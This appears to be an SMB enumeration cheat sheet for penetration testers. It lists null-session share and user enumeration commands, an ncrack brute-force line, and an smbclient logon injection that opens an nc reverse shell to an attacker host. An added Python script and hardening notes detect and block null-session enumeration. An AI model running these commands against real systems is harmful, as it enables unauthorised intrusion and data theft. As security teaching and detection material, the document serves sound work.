# SMB | Windows Domain Enumeration

## Samba / SMB / Windows Domain Enumeration

```
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target
```

Also see the nbtscan cheat sheet.

| COMMAND                   | DESCRIPTION                                                                                                                  |
| ------------------------- | ---------------------------------------------------------------------------------------------------------------------------- |
| `nbtscan 192.168.1.0/24`  | Discover Windows / Samba servers on the subnet: finds MAC addresses, NetBIOS names and the client workgroup / domain          |
| `enum4linux -a target-ip` | Run all enumeration options (including Windows client domain / workgroup lookup) except dictionary-based share name guessing |

**Fingerprint SMB Version**

```
smbclient -L //192.168.1.100
```

**Find open SMB Shares**

```
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24
```

**Enumerate SMB Users**

```
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254
```

{% embed url="https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html" %}

```
nmap --script smb-protocols 10.10.10.10      # list the SMB dialects the server accepts (is SMBv1 still enabled?)

smbclient -L //10.10.10.10
smbclient -L //10.10.10.10 -N                # no password (SMB null session)
smbclient --no-pass -L 10.10.10.10
smbclient //10.10.10.10/share_name

smbmap -H 10.10.10.10
smbmap -H 10.10.10.10 -u '' -p ''
smbmap -H 10.10.10.10 -s share_name

crackmapexec smb 10.10.10.10 -u '' -p '' --shares
crackmapexec smb 10.10.10.10 -u 'sa' -p '' --shares
crackmapexec smb 10.10.10.10 -u 'sa' -p 'sa' --shares
crackmapexec smb 10.10.10.10 -u '' -p '' --share share_name
crackmapexec smb 192.168.0.115 -u '' -p '' --shares --pass-pol

enum4linux -a 10.10.10.10

rpcclient -U "" 10.10.10.10
    # commands at the rpcclient prompt:
    * enumdomusers
    * enumdomgroups
    * queryuser [rid]
    * getdompwinfo
    * getusrdompwinfo [rid]

ncrack -u username -P rockyou.txt -T 5 10.10.10.10 -p smb -v

mount -t cifs "//10.1.1.1/share/" /mnt/wins

mount -t cifs "//10.1.1.1/share/" /mnt/wins -o vers=1.0,user=root,uid=0,gid=0   # force the SMBv1 dialect

SMB shell to reverse shell:

    smbclient -U "username%password" //192.168.0.116/sharename
    smb> logon "/=nc 'attack box ip' 4444 -e /bin/bash"

Checklist:
    * Samba symlink directory traversal attack
```
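The null-session commands above (`smbclient -N`, `smbmap`/`crackmapexec` with empty credentials, `rpcclient -U ""`) leave a recognisable trace on a Windows target: a network logon by `ANONYMOUS LOGON` (Security Event ID 4624, LogonType 3) followed within seconds by share access events (Event ID 5140, typically `IPC$` first, then whatever shares were listed). The script below is an added detection example written for this page; it is not part of the cheat sheet or of any tool it mentions. The `SAMPLE_EVENTS` records are constructed, with a simplified field layout (`event_id`, `logon_type`, `user`, `src_ip`, `share`) that is assumed rather than taken from any specific log shipper, and the five-minute correlation window is an arbitrary choice.

```python
"""
Added example (not from the original cheat sheet): correlate anonymous network
logons (4624 / LogonType 3 / ANONYMOUS LOGON) with anonymous share accesses
(5140) from the same source address to surface SMB null-session enumeration.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events. Field names are a simplified, assumed layout;
# real Windows Security events carry many more fields.
SAMPLE_EVENTS = [
    {"time": "2024-01-15T10:00:01", "event_id": 4624, "logon_type": 3,
     "user": "ANONYMOUS LOGON", "src_ip": "10.10.10.99", "share": None},
    {"time": "2024-01-15T10:00:02", "event_id": 5140,
     "user": "ANONYMOUS LOGON", "src_ip": "10.10.10.99", "share": r"\\*\IPC$"},
    {"time": "2024-01-15T10:00:02", "event_id": 5140,
     "user": "ANONYMOUS LOGON", "src_ip": "10.10.10.99", "share": r"\\*\SYSVOL"},
    {"time": "2024-01-15T10:00:03", "event_id": 5140,
     "user": "ANONYMOUS LOGON", "src_ip": "10.10.10.99", "share": r"\\*\NETLOGON"},
    # Benign: an interactive logon and an authenticated share access by a named user.
    {"time": "2024-01-15T10:05:00", "event_id": 4624, "logon_type": 2,
     "user": "jsmith", "src_ip": "10.10.10.20", "share": None},
    {"time": "2024-01-15T10:05:10", "event_id": 5140,
     "user": "jsmith", "src_ip": "10.10.10.20", "share": r"\\*\Finance"},
    # Anonymous logon with no share access afterwards: worth a look, lower confidence.
    {"time": "2024-01-15T11:00:00", "event_id": 4624, "logon_type": 3,
     "user": "ANONYMOUS LOGON", "src_ip": "10.10.10.50", "share": None},
]

WINDOW = timedelta(minutes=5)  # assumed correlation window


def _ts(event):
    return datetime.fromisoformat(event["time"])


def detect_null_session_enum(events, window=WINDOW):
    """
    Return {src_ip: sorted list of shares} for every source that performed an
    anonymous network logon and then, within `window`, accessed shares
    anonymously. Sources with an anonymous logon but no share access are kept
    with an empty list so an analyst still sees them.
    """
    anon_logons = defaultdict(list)  # src_ip -> list of logon timestamps
    for e in events:
        if (e["event_id"] == 4624 and e.get("logon_type") == 3
                and e["user"] == "ANONYMOUS LOGON"):
            anon_logons[e["src_ip"]].append(_ts(e))

    findings = {ip: set() for ip in anon_logons}
    for e in events:
        if e["event_id"] != 5140 or e["user"] != "ANONYMOUS LOGON":
            continue
        ip, t = e["src_ip"], _ts(e)
        # Only count a share access that follows an anonymous logon from the
        # same IP inside the window (timedelta comparisons, not ints).
        if any(timedelta(0) <= (t - logon) <= window
               for logon in anon_logons.get(ip, [])):
            findings[ip].add(e["share"])
    return {ip: sorted(shares) for ip, shares in findings.items()}


def summarize(findings):
    """Render findings as one severity-tagged line per source address."""
    lines = []
    for ip, shares in sorted(findings.items()):
        if shares:
            lines.append(f"HIGH   {ip}: anonymous logon followed by share "
                         f"enumeration ({', '.join(shares)})")
        else:
            lines.append(f"MEDIUM {ip}: anonymous network logon, no share access seen")
    return lines


if __name__ == "__main__":
    for line in summarize(detect_null_session_enum(SAMPLE_EVENTS)):
        print(line)
```

Two caveats when running this against real logs: Event ID 5140 is only written when "Audit File Share" (Object Access) auditing is enabled, so without it only the 4624 leg fires; and the anonymous `IPC$` access alone can be legitimate on older domain setups, which is why the rule keys on the follow-on share listing rather than on `IPC$` by itself. The corresponding hardening control is the "Network access: Do not allow anonymous enumeration of SAM accounts and shares" policy (the `RestrictAnonymous` setting), which turns the `enumdomusers`/`--shares` steps above into access-denied errors.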

Download a whole SMB share with one command:

```
smbget -R smb://192.168.206.148/kathy
```
